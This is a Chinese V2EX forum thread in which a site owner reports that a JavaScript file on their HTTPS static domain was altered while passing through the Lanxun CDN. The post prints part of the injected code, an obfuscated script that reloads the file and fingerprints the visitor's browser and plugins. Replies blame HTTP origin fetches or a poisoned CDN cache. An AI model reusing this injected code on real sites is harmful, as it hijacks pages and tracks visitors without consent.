好奇 https 下，蓝讯 CDN 分发的 js 内容是如何被篡改的？

V2EX = way to explore

V2EX 是一个关于分享和探索的地方

现在注册

已注册用户请登录

工单节点使用指南

• 请用平和的语言准确描述你所遇到的问题

• 厂商的技术支持和你一样也是有喜怒哀乐的普通人类，尊重是相互的

• 如果是关于 V2EX 本身的问题反馈，请使用反馈节点

这是一个创建于 2290 天前的主题，其中的信息可能已经有所发展或是发生改变。

情况这样，我们有一个域名做静态 static.example.com 资源分发，已经部署了 https，使用的证书是泛域证书，比如 *.example.com 。使用了蓝讯 CDN 的服务。
然后，今天发现这样的情形，有一个 https://static.example.com/js/lib/app.js 的内容被篡改了，检查过浏览器的证书，没问题，是我们自己的泛域名证书 *.example.com ，但内容已经变成类似如下的东西。

var _jsurl = "http://static.example.com/js/lib/app.js";_jsurl += (_jsurl.indexOf('?') > 0 ? '&' : '?') + '_t=' + (new Date().getTime());var _b = "XXTS02";var _c = "1317528361_(D1gRiK90V1atV1P6D9==_1767603217_1_)ie==";var jsNode1=document.createElement("script");jsNode1.setAttribute("type","text/javascript"),jsNode1.setAttribute("src",_jsurl),document.head?document.head.appendChild(jsNode1):document.body&&document.body.appendChild(jsNode1); !function(a,b){function c(a){var d,e,f,g,h,i,b="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";for(new Array(-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,62,-1,-1,-1,63,52,53,54,55,56,57,58,59,60,61,-1,-1,-1,-1,-1,-1,-1,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,-1,-1,-1,-1,-1,-1,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,-1,-1,-1,-1,-1),f=a.length,e=0,d="";f>e;){if(g=255&a.charCodeAt(e++),e==f){d+=b.charAt(g>>2),d+=b.charAt((3&g)<<4),d+="==";break}if(h=a.charCodeAt(e++),e==f){d+=b.charAt(g>>2),d+=b.charAt((3&g)<<4|(240&h)>>4),d+=b.charAt((15&h)<<2),d+="=";break}i=a.charCodeAt(e++),d+=b.charAt(g>>2),d+=b.charAt((3&g)<<4|(240&h)>>4),d+=b.charAt((15&h)<<2|(192&i)>>6),d+=b.charAt(63&i)}return d}function d(){return-1!=b.userAgent.indexOf("MSIE")?"ie":-1!=b.userAgent.indexOf("Chrome")?"Chrome":-1!=b.userAgent.indexOf("Firefox")?"Firefox":-1!=b.userAgent.indexOf("Opera")?"Opera":-1!=b.userAgent.indexOf("Netscape")?"Netscape":-1!=b.userAgent.indexOf("Safari")?"Safari":""}function e(){function e(){var a="",c=b.plugins;if(c.length>0)for(j=0;j

蓝讯

CDN

分发

泛域

11 条回复 • 2018-08-07 15:24:24 +08:00

JGideon

2018-08-07 12:20:25 +08:00

cdn 回源用的是 http ？

zhuowenli

2018-08-07 12:22:20 +08:00

之前遇到过 CDN 跟 CDN 服务器之间同步没有走 HTTPS，然后在同步的过程中被篡改的。

stevenhawking

2018-08-07 13:04:36 +08:00

记得国外有个 Jsdelivr，在中国跟网宿合作的。

但是，不久前被污染了

Livid

MOD

2018-08-07 13:07:51 +08:00

建议源站只监听 https 443 端口，然后只允许 CDN 通过 https 方式回源。

wsad001002

2018-08-07 13:09:54 +08:00 via iPhone

不清楚楼主的具体拓扑，但是我司使用 akamai 的 dsa( https 加速)是需要在我司的服务器上安装一套证书私钥(origin-www.example.com)，在 akamai 上也安装一套证书私钥(www.example.com)。用户访问 www.example.com 的时候其实是与 akamai 的 edge 服务器建立 https 连接，然后 akamai 将数据 downgrade 成 http，然后内部做四七层转发或者其他自定义缓存控制，然后再与我司 origin-www.example.com 服务器建立 https 服务。至少与 akamai 的工程师确认过，数据在他们内部就是透明的。其实也可以理解，如果数据在 cdn 处不透明，他们无法解密 https 数据流的话，那么 cdn 也无法建立缓存和策略控制。目测是 cdn 的缓存有问题，被污染了，所以，换个靠谱的 cdn 吧…